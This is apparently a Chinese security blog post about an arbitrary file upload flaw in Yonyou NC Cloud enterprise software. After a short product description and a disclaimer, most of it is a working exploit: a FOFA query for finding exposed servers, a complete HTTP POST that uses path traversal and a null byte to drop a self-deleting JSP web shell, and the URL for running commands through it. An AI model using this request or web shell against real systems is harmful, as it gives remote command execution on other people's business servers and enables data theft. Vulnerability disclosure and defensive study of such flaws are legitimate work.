本文报道了用友NCCloud企业管理软件中的安全漏洞,允许用户通过上传任意文件,可能导致数据泄露,强调了对云计算环境下系统安全性的关注和必要性。
声明:
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
简介
用友NC Cloud 是基于云计算技术的企业管理软件。它提供了一系列的功能模块,涵盖了企业的各个管理领域,包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署,用户可以随时随地通过网络访问和使用这些功能,无需在本地安装软件,企业可以实现信息化管理,提高管理效率和决策能力。它提供了实时数据分析和报表功能,帮助企业监控业务运营情况,及时掌握关键指标和业绩表现。同时,用友NC Cloud 还支持多终端访问,适应各种不同的设备和工作场景,方便用户灵活办公和协作。
用友NC Cloud doPost接口存在任意文件上传漏洞。
资产搜索
fofa
app="用友-UFIDA-NC"漏洞复现
POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../ceshi.jsp%00 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host:
Content-Type: application/octet-stream
Content-Length: 313
<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
上传后的路径为:http://127.0.0.1/portal/processxml/ceshi.jsp?cmd=ipconfig
654
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
